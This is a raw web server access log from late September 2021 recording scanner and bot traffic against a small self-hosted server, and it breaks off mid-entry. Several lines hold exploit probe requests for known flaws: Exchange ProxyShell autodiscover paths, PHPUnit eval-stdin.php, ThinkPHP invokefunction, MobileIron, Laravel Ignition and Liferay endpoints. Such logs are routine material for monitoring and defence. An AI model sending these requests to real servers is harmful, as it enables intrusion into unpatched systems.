[Client 47.242.93.242] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:17:37:32 +0000] 400 - - https localhost "-" [Client 47.242.93.242] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:17:37:33 +0000] 400 - - https localhost "-" [Client 47.242.93.242] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:17:37:34 +0000] 400 - - https localhost "-" [Client 47.242.93.242] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:17:37:34 +0000] 400 - - https localhost "-" [Client 47.242.93.242] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:17:37:35 +0000] 400 - - https localhost "-" [Client 47.242.93.242] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:17:37:36 +0000] 400 - - https localhost "-" [Client 47.242.93.242] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:17:39:35 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.242.93.242] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [27/Sep/2021:17:39:35 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.242.93.242] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [27/Sep/2021:17:39:36 +0000] 444 - GET https localhost "/" [Client 47.242.93.242] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:17:39:36 +0000] 444 - GET https 64.22.31.253 "/text4041632764320" [Client 47.242.93.242] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [27/Sep/2021:17:39:36 +0000] 400 - GET http 64.22.31.253 "/text4041632764320" [Client 47.242.93.242] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [27/Sep/2021:17:39:36 +0000] 400 - GET http localhost "/" [Client 47.242.93.242] [Length 252] [Gzip -] "-" "-" [27/Sep/2021:17:39:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.242.93.242] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:17:39:37 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.242.93.242] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [27/Sep/2021:17:39:37 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.242.93.242] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [27/Sep/2021:17:39:37 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.242.93.242] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [27/Sep/2021:17:39:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.242.93.242] [Length 252] [Gzip -] "-" "-" [27/Sep/2021:17:39:38 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.242.93.242] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [27/Sep/2021:17:40:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.242.93.242] [Length 0] [Gzip -] "-" "-" [27/Sep/2021:17:40:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.242.93.242] [Length 0] [Gzip -] "curl/7.75.0" "-" [27/Sep/2021:19:08:06 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Sep/2021:19:46:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.110.210.212] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [27/Sep/2021:19:47:00 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 143.110.210.212] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [27/Sep/2021:19:47:02 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 143.110.210.212] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [27/Sep/2021:20:00:34 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Sep/2021:20:43:05 +0000] 400 - - http localhost "-" [Client 89.248.165.205] [Length 154] [Gzip -] "-" "-" [27/Sep/2021:22:19:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Sep/2021:22:25:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.156.224.9] [Length 0] [Gzip -] "libwww-perl/6.56" "-" [27/Sep/2021:23:03:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Sep/2021:23:57:39 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [27/Sep/2021:23:58:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 170.130.187.42] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [28/Sep/2021:00:28:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.205.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:00:29:13 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.5] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:00:30:13 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.204.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:00:54:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [28/Sep/2021:01:11:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.33.96.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Sep/2021:02:01:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Sep/2021:02:17:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [28/Sep/2021:03:10:34 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Sep/2021:05:30:01 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.198.70] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:06:08:53 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Sep/2021:07:31:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.42] [Length 0] [Gzip -] "-" "-" [28/Sep/2021:07:31:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.42] [Length 252] [Gzip -] "-" "-" [28/Sep/2021:07:31:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Sep/2021:07:37:30 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [28/Sep/2021:08:35:46 +0000] 444 - GET https 64.22.31.253 "/saml/login/" [Client 192.241.208.247] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:08:58:19 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 34.96.130.22] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [28/Sep/2021:09:26:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Sep/2021:09:27:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.204.225] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:09:36:46 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:36:47 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:36:50 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [28/Sep/2021:09:36:52 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:36:54 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:36:55 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:36:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:36:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:36:57 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:37:00 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:37:02 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:09:37:02 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Sep/2021:10:51:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Sep/2021:11:14:57 +0000] 400 - GET http 64.22.31.253 "/adfs/portal/images/theme/light01/profile.webp" [Client 172.104.131.24] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:11:14:58 +0000] 444 - GET https 64.22.31.253 "/adfs/portal/images/theme/light01/profile.webp" [Client 172.104.131.24] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:11:56:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 164.90.178.65] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [28/Sep/2021:12:08:20 +0000] 400 - GET http 64.22.31.253 "/adfs/portal/images/theme/light01/profile.webp" [Client 172.104.131.24] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:12:08:20 +0000] 444 - GET https 64.22.31.253 "/adfs/portal/images/theme/light01/profile.webp" [Client 172.104.131.24] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:12:33:59 +0000] 444 - POST https 64.22.31.253 "/owa/auth.owa" [Client 68.117.13.196] [Length 0] [Gzip -] "python-requests/2.24.0" "-" [28/Sep/2021:12:37:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.210.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:12:39:46 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Sep/2021:12:42:52 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.86.35.28] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [28/Sep/2021:13:45:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [28/Sep/2021:15:15:28 +0000] 400 - - http localhost "-" [Client 89.248.165.206] [Length 154] [Gzip -] "-" "-" [28/Sep/2021:15:15:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Sep/2021:15:19:07 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Sep/2021:15:19:07 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Sep/2021:15:23:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.80] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:15:47:32 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [28/Sep/2021:15:57:43 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Sep/2021:17:02:29 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Sep/2021:17:02:29 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Sep/2021:17:02:29 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Sep/2021:17:02:29 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Sep/2021:17:02:29 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Sep/2021:17:02:29 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Sep/2021:18:15:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.57] [Length 0] [Gzip -] "-" "-" [28/Sep/2021:18:15:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "-" "-" [28/Sep/2021:18:15:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Sep/2021:18:57:16 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Sep/2021:21:11:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Sep/2021:21:26:33 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Sep/2021:22:41:48 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.210.210] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:23:02:46 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.206.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Sep/2021:23:29:23 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 34.86.35.0] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [28/Sep/2021:23:55:43 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.203.122] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:00:29:32 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:00:33:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:00:33:38 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:01:26:35 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:01:34:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.84.206.124] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/55.0.3036.97 Safari/537.32" "-" [29/Sep/2021:01:34:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.84.206.124] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/55.0.3036.97 Safari/537.32" "-" [29/Sep/2021:02:22:31 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:02:55:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.252] [Length 0] [Gzip -] "-" "-" [29/Sep/2021:03:38:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.64.44] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [29/Sep/2021:03:56:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Sep/2021:03:58:34 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.77.162.5] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [29/Sep/2021:04:41:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.232] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [29/Sep/2021:04:41:36 +0000] 400 - - https localhost "-" [Client 185.31.175.252] [Length 154] [Gzip -] "-" "-" [29/Sep/2021:04:42:09 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.221] [Length 0] [Gzip -] "-" "-" [29/Sep/2021:04:42:21 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.160] [Length 0] [Gzip -] "-" "-" [29/Sep/2021:04:42:26 +0000] 400 - - https localhost "-" [Client 81.17.18.62] [Length 154] [Gzip -] "-" "-" [29/Sep/2021:04:47:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Sep/2021:05:31:05 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.198.117] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:05:38:27 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:05:53:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [29/Sep/2021:07:11:14 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:07:38:00 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 94.156.189.203] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [29/Sep/2021:09:15:02 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:09:30:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.197.150] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:09:47:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Sep/2021:10:17:54 +0000] 400 - GET https localhost "/MIYm" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [29/Sep/2021:10:48:58 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Sep/2021:10:48:58 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Sep/2021:10:49:04 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Sep/2021:10:49:04 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Sep/2021:10:49:04 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Sep/2021:10:49:08 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [29/Sep/2021:10:49:11 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Sep/2021:10:49:13 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Sep/2021:11:23:45 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:12:38:10 +0000] 444 - GET https 64.22.31.253 